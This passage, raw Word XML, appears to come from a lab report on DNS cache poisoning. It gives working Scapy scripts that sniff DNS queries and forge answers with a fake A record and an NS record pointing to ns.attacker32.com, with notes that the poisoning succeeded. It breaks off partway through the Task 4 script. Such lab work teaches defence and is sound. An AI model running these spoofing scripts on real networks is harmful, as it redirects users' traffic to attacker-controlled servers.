    <w:p w14:paraId="27BF0F77"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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C11B8C" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764AC976"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sniffed_ip  = pkt[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F9A85"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sniffed_udp = pkt[UDP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D77B477"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sniffed_dns = pkt[DNS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4452EC08" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C35CE97"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ip       = IP(src=sniffed_ip.dst, dst=sniffed_ip.src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77434EF8"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udp      = UDP(sport=53, dport=sniffed_udp.sport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39714F"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Anssec   = DNSRR(rrname=sniffed_dns.qd.qname, type="A", ttl=259200, rdata="1.2.3.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCCF38"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dns      = DNS(id=sniffed_dns.id, qd=sniffed_dns.qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, an=Anssec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50668A5C"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spoofpkt = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D6BE5F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3151F8E9" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C6D78A" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57479B41" w14:textId="77777777" w:rsidR="00E4540E" w:rsidRPr="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>myFilter = "udp and (src host {} and dst port 53)".format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243C970" w14:textId="56D7BCA3" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pkt = sniff(iface="br-9dc788eb17b7", filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CADBB" w14:textId="3D51A3B8" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000299F2" w14:textId="19815466" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:r>
        <w:t>In the screenshot below we can see that the user received the spoofed response and the local DNS server cached the entry:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3265E4E1" wp14:editId="539F18A5">
            <wp:extent cx="5943600" cy="3058160"/>
            <wp:effectExtent l="0" t="0" r="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5943600" cy="3058160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="118F9A75" w14:textId="0C4CAC80" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:r>
        <w:t>One thing to notice here is that the name-server for example.com is still pointing to one of the official IP addresses. This means that the attack was not completely successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7482544F" w14:textId="46E9422D" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="7D9C8C57" w14:textId="79C0D732" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="760C8116" w14:textId="58C126CC" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="04FA390E" w14:textId="0E6B7281" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="4B147CFA" w14:textId="6C0B72E9" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="0E444AA9" w14:textId="6CF0EC2A" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="71A0FEFE" w14:textId="48633A4D" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="21C088B2" w14:textId="7248DDA4" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="706BD9A1" w14:textId="7488FBD5" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="46320E71" w14:textId="0960ECD5" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="666A4A71" w14:textId="16B6D18E" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E"/>
    <w:p w14:paraId="7E91FBC4" w14:textId="5DCCF12F" w:rsidR="00E4540E" w:rsidRDefault="00E4540E" w:rsidP="00E4540E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4540E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Spoofing NS Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D88EB" w14:textId="78C153FA" w:rsidR="00E4540E" w:rsidRDefault="006658AB" w:rsidP="00E4540E">
      <w:r>
        <w:t xml:space="preserve">As discussed in the previous task, only </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="004342D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> was affected by the attack. To affect all the domain names on example.com we need to include fake name server mappings as well. This mapping should be a part of the authority section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF940F" w14:textId="6AE7862A" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="00E4540E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE830B6" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A18DEF" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CEDF2B" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68544A30" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEFDEA" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484FB1C1" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>target  = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34631859" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9E300" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08765A95" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DC8F7"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if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57938678"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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A8229" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F802D32"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sniffed_ip  = pkt[IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6352A9E2"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sniffed_udp = pkt[UDP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C3151"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sniffed_dns = pkt[DNS]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070CF80D" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1794B582"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ip       = IP(src=sniffed_ip.dst, dst=sniffed_ip.src)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F040B34"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udp      = UDP(sport=53, dport=sniffed_udp.sport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E8E9A"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Anssec   = DNSRR(rrname=sniffed_dns.qd.qname, type="A", ttl=259200, rdata="1.2.3.4")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A217314"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Nssec    = DNSRR(rrname="example.com", type="NS", rdata="ns.attacker32.com", ttl=259200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60488488"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dns      = DNS(id=sniffed_dns.id, qd=sniffed_dns.qd, aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=1, an=Anssec, ns=Nssec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59112D12"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spoofpkt = ip/udp/dns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FAF950" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B2982" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        send(spoofpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B449F5" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7085EB6E" w14:textId="77777777" w:rsidR="006658AB" w:rsidRPr="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>myFilter = "udp and (src host {} and dst port 53)".format(target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F12F1F7" w14:textId="61B60D5A" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>pkt = sniff(iface="br-9dc788eb17b7", filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B160E" w14:textId="2FF9E131" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2040E0EE" w14:textId="447AC05C" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:r>
        <w:t>This time, the attack was successful, and we can see that all the mappings have fake IP addresses:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="333CC89F" wp14:editId="38C04DF0">
            <wp:extent cx="5943600" cy="32848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3284855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="343270E6" w14:textId="0E21FB7A" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="48B93B94" w14:textId="052F88D1" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="0BA06A8F" w14:textId="24249F02" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="2BF4C5E7" w14:textId="6858EEE8" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="36D218C4" w14:textId="350CF2EB" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="4CCFE16F" w14:textId="5E0844C7" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="7E435DE1" w14:textId="79758DE6" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="2DD1B8DA" w14:textId="61AD4641" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="4F6D1B41" w14:textId="27BB7F2E" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="5F0AD722" w14:textId="3DEC21DF" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="0122498D" w14:textId="1B6C4CAA" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB"/>
    <w:p w14:paraId="24C5D034" w14:textId="1B3708FF" w:rsidR="006658AB" w:rsidRDefault="006658AB" w:rsidP="006658AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006658AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: Spoofing NS Records for another domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960E239" w14:textId="7246C5B1" w:rsidR="006658AB" w:rsidRDefault="00E3047D" w:rsidP="006658AB">
      <w:r>
        <w:t>After the success of the last attack, it was time to try the same attack for other domains by adding another NS record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7B6B3A" w14:textId="49CD460F" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="006658AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7B69C" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02552890" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1801BE08" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E408B6" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EE364" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D652C9" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>target  = sys.argv[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E32D298" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NS_NAME = "example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5E86F" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6972D4A5" w14:textId="77777777" w:rsidR="00E3047D" w:rsidRPr="00E3047D" w:rsidRDefault="00E3047D" w:rsidP="00E3047D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3047D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>def spoof_dns(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7554B47A"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if (DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):</w:t>
      </w:r>
    </w:p>
